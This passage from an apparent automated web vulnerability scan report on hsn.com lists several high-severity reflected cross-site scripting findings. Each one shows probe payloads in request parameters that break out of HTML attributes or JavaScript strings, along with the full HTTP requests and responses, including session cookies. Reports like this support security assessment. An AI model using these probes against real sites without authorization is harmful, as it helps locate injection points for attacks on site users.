Set-Cookie: mscssid=id=ijnEcmL0LeSYnSdgZDWVtn5I%2feZcEGoIh%2bt%2bjK7aeMouZMGn%2bkFmZg%3d%3d&abtid=9u2rxs6CrHfymdFbU0vPxE4wpsUD6e9UGzYBzskq4PNk8QK2nXD9VQ%3d%3d&Look_Up_=CE_1; domain=.hsn.com; expires=Sat, 10-Dec-2011 19:53:34 GMT; path=/
Set-Cookie: CustState=Now=12/10/2010 2:53:34 PM&signedIn=false&bagCount=0&wishCount=0&abValue=B; domain=.hsn.com; path=/
Set-Cookie: BlogState=IsAuth=u1VtG%2fXmYLk%3d&TOS=&Id=l111hy1OCvjYIDG%2f4xivHzT9y%2fIz7YVpD69OuT83bqI%3d&Nickname=&IsBanned=; domain=.hsn.com; path=/
Set-Cookie: TLTSID=9CEE2A214C9859B6C83CA5992974FC0A; domain=.hsn.com; path=/
Set-Cookie: TLTHID=9CEE2A214C9859B6C83CA5992974FC0A; domain=.hsn.com; path=/
Date: Fri, 10 Dec 2010 19:53:34 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 131737


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00__Header1">
<me
...[SNIP]...
px?pop=1&url=__URL__&title=__TITLE__"
shareUrl="http://kitchen-dining.hsn.com/main-street-cupcakes-12-count-vanilla-with-chocolate-chip-cookie-dough-half-baked-gourme_p-5590079_xp.aspx?b05ac" a=b bcd9487a494=1&cm_mmc=sharingsite*email*PD*494128"
shareTitle="Main Street Cupcakes 12-count Vanilla with Chocolate Chip Cookie Dough &quot;Half-Baked&quot; Gourme at HSN.com"
cmspT
...[SNIP]...

1.20. http://kitchen-dining.hsn.com/waggoner-chocolates-world-of-chocolate_p-3703923_xp.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://kitchen-dining.hsn.com
Path:   /waggoner-chocolates-world-of-chocolate_p-3703923_xp.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b582f"%20a%3db%200ed7d85e4ed was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b582f" a=b 0ed7d85e4ed in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /waggoner-chocolates-world-of-chocolate_p-3703923_xp.aspx?b582f"%20a%3db%200ed7d85e4ed=1 HTTP/1.1
Host: kitchen-dining.hsn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR LAW CURa ADMa DEVa PSAa PSDa OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-AspNetMvc-Version: 2.0
Set-Cookie: abtests=1=B&2=B&4=B&5=B&6=B&7=B&12=B&13=B&16=B&17=B&23=B&25=B&28=B&30=B&31=C&38=B&39=B&40=B&41=B&42=A&43=A&44=B&45=B; domain=hsn.com; path=/
Set-Cookie: partnerpromo=HsnMobileDevice=yoYhJRt9oTAMFluM%2fuyUdQ%3d%3d&Look_Up_=CE_1; domain=.hsn.com; expires=Sat, 11-Dec-2010 19:53:29 GMT; path=/
Set-Cookie: customer=ksUrl=lsLq3Cu4zy9KjsDCrDb9QeuVzUnYkloJ&Look_Up_=CE_1; domain=.hsn.com; path=/
Set-Cookie: sitesession=pdPage=http%3a%2f%2fkitchen-dining.hsn.com%3a80%2fwaggoner-chocolates-world-of-chocolate_p-3703923_xp.aspx%3fb582f%22%2520a%253db%25200ed7d85e4ed%3d1; domain=.hsn.com; path=/
Set-Cookie: myhsn=LastViewed=Kasv7VOlF1Oj%2btWnRF6IVw%3d%3d&Look_Up_=CE_1; domain=.hsn.com; expires=Sat, 10-Dec-2011 19:53:29 GMT; path=/
Set-Cookie: sessionid=id=QOTkHUiQ%2bKMkMSohcDbOxENrQYeb1ppbpwRvm2ZPQksg4k6p1%2fdceQ%3d%3d&Look_Up_=CE_1; domain=.hsn.com; path=/
Set-Cookie: mscssid=id=9FNOERDbbnPpf2cHMJTA2ygGKSgKM6h3VPkBz9itlx8u2Vil0u2VOA%3d%3d&abtid=w%2btpG4PBJruI3hugJUejcicr%2b8EzVB1W%2bjD3Pe72MTdmSAIN1yIYNQ%3d%3d&Look_Up_=CE_1; domain=.hsn.com; expires=Sat, 10-Dec-2011 19:53:29 GMT; path=/
Set-Cookie: CustState=Now=12/10/2010 2:53:29 PM&signedIn=false&bagCount=0&wishCount=0&abValue=B; domain=.hsn.com; path=/
Set-Cookie: BlogState=IsAuth=u1VtG%2fXmYLk%3d&TOS=&Id=8x%2bo43LWlxGAfHNZU5QaQResozNe%2fWL4q%2bXO%2bmymL5k%3d&Nickname=&IsBanned=; domain=.hsn.com; path=/
Set-Cookie: TLTSID=DE1D860F4F1A1B42A193E9BCDFE35ACB; domain=.hsn.com; path=/
Set-Cookie: TLTHID=DE1D860F4F1A1B42A193E9BCDFE35ACB; domain=.hsn.com; path=/
Date: Fri, 10 Dec 2010 19:53:29 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 111029


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00__Header1">
<me
...[SNIP]...
http://www.hsn.com/com/email_suggestion/default.aspx?pop=1&url=__URL__&title=__TITLE__"
shareUrl="http://kitchen-dining.hsn.com/waggoner-chocolates-world-of-chocolate_p-3703923_xp.aspx?b582f" a=b 0ed7d85e4ed=1&cm_mmc=sharingsite*email*PD*278651"
shareTitle="Waggoner Chocolates World of Chocolate at HSN.com"
cmspTag="cm_sp=share*email*PD"
style="background-po
...[SNIP]...

1.21. http://sports.hsn.com/steiner-sports-dwight-gooden-yankees-no-hitter-celebration-autographed-photograph_p-6190164_xp.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://sports.hsn.com
Path:   /steiner-sports-dwight-gooden-yankees-no-hitter-celebration-autographed-photograph_p-6190164_xp.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload edda3"%20a%3db%209d97619d03c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as edda3" a=b 9d97619d03c in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /steiner-sports-dwight-gooden-yankees-no-hitter-celebration-autographed-photograph_p-6190164_xp.aspx?edda3"%20a%3db%209d97619d03c=1 HTTP/1.1
Host: sports.hsn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR LAW CURa ADMa DEVa PSAa PSDa OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-AspNetMvc-Version: 2.0
Set-Cookie: abtests=1=B&2=B&4=B&5=B&6=B&7=B&12=B&13=B&16=B&17=B&23=B&25=B&28=A&30=A&31=C&38=B&39=B&40=B&41=B&42=A&43=A&44=B&45=A; domain=hsn.com; path=/
Set-Cookie: partnerpromo=HsnMobileDevice=yoYhJRt9oTAMFluM%2fuyUdQ%3d%3d&Look_Up_=CE_1; domain=.hsn.com; expires=Sat, 11-Dec-2010 19:58:35 GMT; path=/
Set-Cookie: customer=ksUrl=lsLq3Cu4zy%2fO5D1o8L2Tv2UwJLhEwYhY&Look_Up_=CE_1; domain=.hsn.com; path=/
Set-Cookie: sitesession=pdPage=http%3a%2f%2fsports.hsn.com%3a80%2fsteiner-sports-dwight-gooden-yankees-no-hitter-celebration-autographed-photograph_p-6190164_xp.aspx%3fedda3%22%2520a%253db%25209d97619d03c%3d1; domain=.hsn.com; path=/
Set-Cookie: myhsn=LastViewed=dCJHGOPMFPQFqUfYDls8Hg%3d%3d&Look_Up_=CE_1; domain=.hsn.com; expires=Sat, 10-Dec-2011 19:58:35 GMT; path=/
Set-Cookie: sessionid=id=CQKhGphYGYXvKRpzjrzIkWT0JvgcAtlHgDcFF7czGGpw0p3fUecopg%3d%3d&Look_Up_=CE_1; domain=.hsn.com; path=/
Set-Cookie: mscssid=id=wPCxAmu%2fZU0PwyUd6nbl3KhYzp17khNr1Vq1tpyaXhILKUrRGjPy2A%3d%3d&abtid=6IKpljBBL4lyycFDGnOJbDz7dEcPsotTGrnHpiqCPAcIJz5VaTEuVw%3d%3d&Look_Up_=CE_1; domain=.hsn.com; expires=Sat, 10-Dec-2011 19:58:35 GMT; path=/
Set-Cookie: CustState=Now=12/10/2010 2:58:35 PM&signedIn=false&bagCount=0&wishCount=0&abValue=A; domain=.hsn.com; path=/
Set-Cookie: BlogState=IsAuth=u1VtG%2fXmYLk%3d&TOS=&Id=uk%2bpOOrRzDb0q4kNsouys5WcBhqZzuh6DhxUIA3K0RA%3d&Nickname=&IsBanned=; domain=.hsn.com; path=/
Set-Cookie: TLTSID=2FC163494D3B0446F201E8979EA89E48; domain=.hsn.com; path=/
Set-Cookie: TLTHID=2FC163494D3B0446F201E8979EA89E48; domain=.hsn.com; path=/
Date: Fri, 10 Dec 2010 19:58:35 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 109471


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00__Header1">
<me
...[SNIP]...
tion/default.aspx?pop=1&url=__URL__&title=__TITLE__"
shareUrl="http://sports.hsn.com/steiner-sports-dwight-gooden-yankees-no-hitter-celebration-autographed-photograph_p-6190164_xp.aspx?edda3" a=b 9d97619d03c=1&cm_mmc=sharingsite*email*PD*1085635"
shareTitle="Steiner Sports Dwight Gooden Yankees &quot;No Hitter Celebration&quot; Autographed Photograph at HSN.com"
cmspTag="cm
...[SNIP]...

1.22. http://sports.hsn.com/steiner-sports-ernie-banks-mlb-signed-baseball-with-hof-77-inscription_p-6189802_xp.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://sports.hsn.com
Path:   /steiner-sports-ernie-banks-mlb-signed-baseball-with-hof-77-inscription_p-6189802_xp.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 93460"%20a%3db%20bd8fb62270 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 93460" a=b bd8fb62270 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /steiner-sports-ernie-banks-mlb-signed-baseball-with-hof-77-inscription_p-6189802_xp.aspx?93460"%20a%3db%20bd8fb62270=1 HTTP/1.1
Host: sports.hsn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR LAW CURa ADMa DEVa PSAa PSDa OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-AspNetMvc-Version: 2.0
Set-Cookie: abtests=1=B&2=B&4=B&5=B&6=B&7=B&12=B&13=B&16=B&17=B&23=B&25=B&28=B&30=B&31=C&38=B&39=B&40=B&41=B&42=A&43=A&44=B&45=B; domain=hsn.com; path=/
Set-Cookie: partnerpromo=HsnMobileDevice=yoYhJRt9oTAMFluM%2fuyUdQ%3d%3d&Look_Up_=CE_1; domain=.hsn.com; expires=Sat, 11-Dec-2010 19:58:33 GMT; path=/
Set-Cookie: customer=ksUrl=lsLq3Cu4zy9yoMOwFe8nm2T5h6T1ljwy&Look_Up_=CE_1; domain=.hsn.com; path=/
Set-Cookie: sitesession=pdPage=http%3a%2f%2fsports.hsn.com%3a80%2fsteiner-sports-ernie-banks-mlb-signed-baseball-with-hof-77-inscription_p-6189802_xp.aspx%3f93460%22%2520a%253db%2520bd8fb62270%3d1; domain=.hsn.com; path=/
Set-Cookie: myhsn=LastViewed=2DeknegkyihqxIkdPb6%2bow%3d%3d&Look_Up_=CE_1; domain=.hsn.com; expires=Sat, 10-Dec-2011 19:58:33 GMT; path=/
Set-Cookie: sessionid=id=I4qzYy%2fMB8A4SefRNL8BnpiOJHZIwFxtiu476zu52sMcjdWhozrkdA%3d%3d&Look_Up_=CE_1; domain=.hsn.com; path=/
Set-Cookie: mscssid=id=6cWd6F6j00UyFjC6blX%2bWLIS%2bx4c9tI2UXplwb%2fGn4POsjz5%2bn5MIg%3d%3d&abtid=A4VxRyeoMVzZs2epsb%2fUqSHo22gpjs8BUncC8yVa2pnp8PTfhfY3uA%3d%3d&Look_Up_=CE_1; domain=.hsn.com; expires=Sat, 10-Dec-2011 19:58:33 GMT; path=/
Set-Cookie: CustState=Now=12/10/2010 2:58:34 PM&signedIn=false&bagCount=0&wishCount=0&abValue=B; domain=.hsn.com; path=/
Set-Cookie: BlogState=IsAuth=u1VtG%2fXmYLk%3d&TOS=&Id=hWxi2wO8R%2fd5NOm3hLdnLROBiQX1gIBTeAhXiBBDiLA%3d&Nickname=&IsBanned=; domain=.hsn.com; path=/
Set-Cookie: TLTSID=7C0F70974738B6CEED52CF940ED260B0; domain=.hsn.com; path=/
Set-Cookie: TLTHID=7C0F70974738B6CEED52CF940ED260B0; domain=.hsn.com; path=/
Date: Fri, 10 Dec 2010 19:58:34 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 109953


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00__Header1">
<me
...[SNIP]...
mail_suggestion/default.aspx?pop=1&url=__URL__&title=__TITLE__"
shareUrl="http://sports.hsn.com/steiner-sports-ernie-banks-mlb-signed-baseball-with-hof-77-inscription_p-6189802_xp.aspx?93460" a=b bd8fb62270=1&cm_mmc=sharingsite*email*PD*1085115"
shareTitle="Steiner Sports Ernie Banks MLB Signed Baseball with &quot;HOF 77&quot; Inscription. at HSN.com"
cmspTag="cm_sp=share*
...[SNIP]...

1.23. http://sports.hsn.com/steiner-sports-jason-bay-mlb-baseball-with-04-nl-roy-inscription_p-6189818_xp.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://sports.hsn.com
Path:   /steiner-sports-jason-bay-mlb-baseball-with-04-nl-roy-inscription_p-6189818_xp.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9d34"%20a%3db%20cae40db03a0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a9d34" a=b cae40db03a0 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /steiner-sports-jason-bay-mlb-baseball-with-04-nl-roy-inscription_p-6189818_xp.aspx?a9d34"%20a%3db%20cae40db03a0=1 HTTP/1.1
Host: sports.hsn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR LAW CURa ADMa DEVa PSAa PSDa OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-AspNetMvc-Version: 2.0
Set-Cookie: abtests=1=B&2=B&4=B&5=B&6=B&7=B&12=B&13=B&16=B&17=B&23=B&25=B&28=B&30=B&31=C&38=B&39=B&40=B&41=B&42=A&43=A&44=B&45=B; domain=hsn.com; path=/
Set-Cookie: partnerpromo=HsnMobileDevice=yoYhJRt9oTAMFluM%2fuyUdQ%3d%3d&Look_Up_=CE_1; domain=.hsn.com; expires=Sat, 11-Dec-2010 19:58:24 GMT; path=/
Set-Cookie: customer=ksUrl=lsLq3Cu4zy9yoMOwFe8nm%2bPOx%2bXavdGX&Look_Up_=CE_1; domain=.hsn.com; path=/
Set-Cookie: sitesession=pdPage=http%3a%2f%2fsports.hsn.com%3a80%2fsteiner-sports-jason-bay-mlb-baseball-with-04-nl-roy-inscription_p-6189818_xp.aspx%3fa9d34%22%2520a%253db%2520cae40db03a0%3d1; domain=.hsn.com; path=/
Set-Cookie: myhsn=LastViewed=2Deknegkyigi182slrdFxw%3d%3d&Look_Up_=CE_1; domain=.hsn.com; expires=Sat, 10-Dec-2011 19:58:24 GMT; path=/
Set-Cookie: sessionid=id=HfJ%2fKi2mmsl8KmIccFxk1TYtjrjjC%2fyR2g4o4kv5LghDHn2SijptoA%3d%3d&Look_Up_=CE_1; domain=.hsn.com; path=/
Set-Cookie: mscssid=id=Zxdul14WlmD%2bggweqrvXUuwmIxDaOUanfh0fUYsSyZwlar1%2b9IpTxw%3d%3d&abtid=lRXnAJtxuZcyZCFzhPBTwpxyrStkV9I9gf7jOLplOv9ngaUXTeIjSg%3d%3d&Look_Up_=CE_1; domain=.hsn.com; expires=Sat, 10-Dec-2011 19:58:24 GMT; path=/
Set-Cookie: CustState=Now=12/10/2010 2:58:25 PM&signedIn=false&bagCount=0&wishCount=0&abValue=B; domain=.hsn.com; path=/
Set-Cookie: BlogState=IsAuth=u1VtG%2fXmYLk%3d&TOS=&Id=r4FojdZSwf7J4yuvrabSvmoC6V2VrBS2bnDdzGowbO8%3d&Nickname=&IsBanned=; domain=.hsn.com; path=/
Set-Cookie: TLTSID=E370DF044A17C78A55190A9062304ABE; domain=.hsn.com; path=/
Set-Cookie: TLTHID=E370DF044A17C78A55190A9062304ABE; domain=.hsn.com; path=/
Date: Fri, 10 Dec 2010 19:58:24 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 109397


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00__Header1">
<me
...[SNIP]...
/com/email_suggestion/default.aspx?pop=1&url=__URL__&title=__TITLE__"
shareUrl="http://sports.hsn.com/steiner-sports-jason-bay-mlb-baseball-with-04-nl-roy-inscription_p-6189818_xp.aspx?a9d34" a=b cae40db03a0=1&cm_mmc=sharingsite*email*PD*1085123"
shareTitle="Steiner Sports Jason Bay MLB Baseball with &quot;04' NL ROY&quot; Inscription at HSN.com"
cmspTag="cm_sp=share*email*
...[SNIP]...

1.24. http://www.hsn.com/brand-video-hub_at-4260_xa.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hsn.com
Path:   /brand-video-hub_at-4260_xa.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 57003'%3b7eed68608f7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 57003';7eed68608f7 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /brand-video-hub_at-4260_xa.aspx?57003'%3b7eed68608f7=1 HTTP/1.1
Host: www.hsn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServerhsn_https_pool=520426924.47873.0000; TaazABUser=true; cmRS=&t1=1292009455654&t2=1292009456970&t3=1292009472812&t4=-1&lti=1292009472811&ln=&hr=/100k-givaway_at-5167_xa.aspx%3Fnolnav%3D1&fti=&fn=UNDEFINED%3A0%3B&ac=&fd=&uer=&fu=&pi=/cnt/shared/tnavv7.aspx&ho=ww62.hsn.com/cm%3F&ci=90028889&ul=http%3A//www.hsn.com/cnt/shared/tnavV7.aspx&rf=http%3A//blogs.hsn.com/; __utmv=94391299.B; sitesession=o=esearch; mscssid=id=iExgNTNr0TNR4KT%2f5nWyYD9J6CUEJP05OB7Gq3uzgr21yIY%2b%2f7KCHA%3d%3d&abtid=Z1y1O2Wx7Tjmm31iwnqIK9rKFZDN0DnAm6FwDT3N9jpWeVHhWc9cXg%3d%3d&Look_Up_=CE_1; __utmz=94391299.1292009442.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CoreAt=90028889=1|0|0|0|0|0|0|0|0|0|0|3|1|1292009445||&; TLTHID=50D51C6141D4048D3DAB44B6B7C991C7; customer=ksUrl=RVwtpbjDdY5%2bW9Wphwke9SnTqSux1ZyoKTQPzYbvJZk%2bS3P28VZzHv1DKWRE8Cbi0%2bf43wWRedlx84PHSSXVRkOUXAREsRGQ4kLtl8CWpiHZo7Ny973JCPB3o%2bLQBJye3tzF69C5bO421yv8%2bBi%2fKxF5fzZW0lbi4JQeipFIzM5nfH29l2hKpmWbpQn5gY06&Look_Up_=CE_1&email=; sessionid=id=vneYae8DsJOq6iQ1NbT9W5m%2fhjkb%2fItfuYp9RnwK28gXd9rFhMTCAw%3d%3d&Look_Up_=CE_1; bandwidth=1484; CustState=Now=12/10/2010 2:31:30 PM&signedIn=false&bagCount=0&wishCount=0&abValue=B; BlogState=IsAuth=u1VtG%2fXmYLk%3d&TOS=&Id=rWQVMUrBjylxsrbqYH02xc5IDsO2ukwGTYVZjUW0d8w%3d&Nickname=&IsBanned=; custPref=persistentBar=true; __utma=94391299.504240029.1292009442.1292009442.1292009442.1; abtests=1=B&2=B&4=B&5=B&6=B&7=B&12=B&13=B&16=B&17=B&23=B&25=B&28=A&30=B&31=C&38=B&39=B&40=B&41=B&42=A&43=A&44=B&45=B; __utmc=94391299; __utmb=94391299.20.10.1292009442; partnerpromo=HsnMobileDevice=yoYhJRt9oTAMFluM%2fuyUdQ%3d%3d&Look_Up_=CE_1; newAlerts=0; TLTSID=AD2EA45D444C5361509642BD6C0C11B2;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-transform
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR LAW CURa ADMa DEVa PSAa PSDa OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: sessionid=id=vneYae8DsJOq6iQ1NbT9W5m%2fhjkb%2fItfuYp9RnwK28gXd9rFhMTCAw%3d%3d&Look_Up_=CE_1; domain=.hsn.com; path=/
Set-Cookie: CustState=Now=12/10/2010 3:02:56 PM&signedIn=false&bagCount=0&wishCount=0&abValue=B; domain=.hsn.com; path=/
Set-Cookie: BlogState=IsAuth=u1VtG%2fXmYLk%3d&TOS=&Id=rWQVMUrBjylxsrbqYH02xc5IDsO2ukwGTYVZjUW0d8w%3d&Nickname=&IsBanned=; domain=.hsn.com; path=/
Set-Cookie: TLTHID=2DE6EFDE4955200105C810AF05F2A1D5; domain=.hsn.com; path=/
Date: Fri, 10 Dec 2010 20:02:55 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 168819


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00__Header1">
<me
...[SNIP]...
WebServices/GetShareComponent.aspx?R=' + Math.floor(Math.random() * 1000); //don not change this
url += "&url=" + encodeURI('http://www.hsn.com/brand-video_at-4260_xa.aspx?57003';7eed68608f7=1') + "&title=" + encodeURI('Brand Video Hub at HSN.com') + "&profile=AT&cmSpPage=articles&pageID=Brand Video Hub";
new Ajax.Updater($('BreadCrumbsSharePlaceHolder'), url,
...[SNIP]...

1.25. http://www.hsn.com/brand-video-hub_at-4260_xa.aspx [nolnav parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hsn.com
Path:   /brand-video-hub_at-4260_xa.aspx

Issue detail

The value of the nolnav request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c25da'%3b426cda0b393 was submitted in the nolnav parameter. This input was echoed as c25da';426cda0b393 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /brand-video-hub_at-4260_xa.aspx?nolnav=1c25da'%3b426cda0b393 HTTP/1.1
Host: www.hsn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServerhsn_https_pool=520426924.47873.0000; TaazABUser=true; cmRS=&t1=1292009455654&t2=1292009456970&t3=1292009472812&t4=-1&lti=1292009472811&ln=&hr=/100k-givaway_at-5167_xa.aspx%3Fnolnav%3D1&fti=&fn=UNDEFINED%3A0%3B&ac=&fd=&uer=&fu=&pi=/cnt/shared/tnavv7.aspx&ho=ww62.hsn.com/cm%3F&ci=90028889&ul=http%3A//www.hsn.com/cnt/shared/tnavV7.aspx&rf=http%3A//blogs.hsn.com/; __utmv=94391299.B; sitesession=o=esearch; mscssid=id=iExgNTNr0TNR4KT%2f5nWyYD9J6CUEJP05OB7Gq3uzgr21yIY%2b%2f7KCHA%3d%3d&abtid=Z1y1O2Wx7Tjmm31iwnqIK9rKFZDN0DnAm6FwDT3N9jpWeVHhWc9cXg%3d%3d&Look_Up_=CE_1; __utmz=94391299.1292009442.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CoreAt=90028889=1|0|0|0|0|0|0|0|0|0|0|3|1|1292009445||&; TLTHID=50D51C6141D4048D3DAB44B6B7C991C7; customer=ksUrl=RVwtpbjDdY5%2bW9Wphwke9SnTqSux1ZyoKTQPzYbvJZk%2bS3P28VZzHv1DKWRE8Cbi0%2bf43wWRedlx84PHSSXVRkOUXAREsRGQ4kLtl8CWpiHZo7Ny973JCPB3o%2bLQBJye3tzF69C5bO421yv8%2bBi%2fKxF5fzZW0lbi4JQeipFIzM5nfH29l2hKpmWbpQn5gY06&Look_Up_=CE_1&email=; sessionid=id=vneYae8DsJOq6iQ1NbT9W5m%2fhjkb%2fItfuYp9RnwK28gXd9rFhMTCAw%3d%3d&Look_Up_=CE_1; bandwidth=1484; CustState=Now=12/10/2010 2:31:30 PM&signedIn=false&bagCount=0&wishCount=0&abValue=B; BlogState=IsAuth=u1VtG%2fXmYLk%3d&TOS=&Id=rWQVMUrBjylxsrbqYH02xc5IDsO2ukwGTYVZjUW0d8w%3d&Nickname=&IsBanned=; custPref=persistentBar=true; __utma=94391299.504240029.1292009442.1292009442.1292009442.1; abtests=1=B&2=B&4=B&5=B&6=B&7=B&12=B&13=B&16=B&17=B&23=B&25=B&28=A&30=B&31=C&38=B&39=B&40=B&41=B&42=A&43=A&44=B&45=B; __utmc=94391299; __utmb=94391299.20.10.1292009442; partnerpromo=HsnMobileDevice=yoYhJRt9oTAMFluM%2fuyUdQ%3d%3d&Look_Up_=CE_1; newAlerts=0; TLTSID=AD2EA45D444C5361509642BD6C0C11B2;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-transform
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR LAW CURa ADMa DEVa PSAa PSDa OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: sessionid=id=vneYae8DsJOq6iQ1NbT9W5m%2fhjkb%2fItfuYp9RnwK28gXd9rFhMTCAw%3d%3d&Look_Up_=CE_1; domain=.hsn.com; path=/
Set-Cookie: CustState=Now=12/10/2010 3:02:53 PM&signedIn=false&bagCount=0&wishCount=0&abValue=B; domain=.hsn.com; path=/
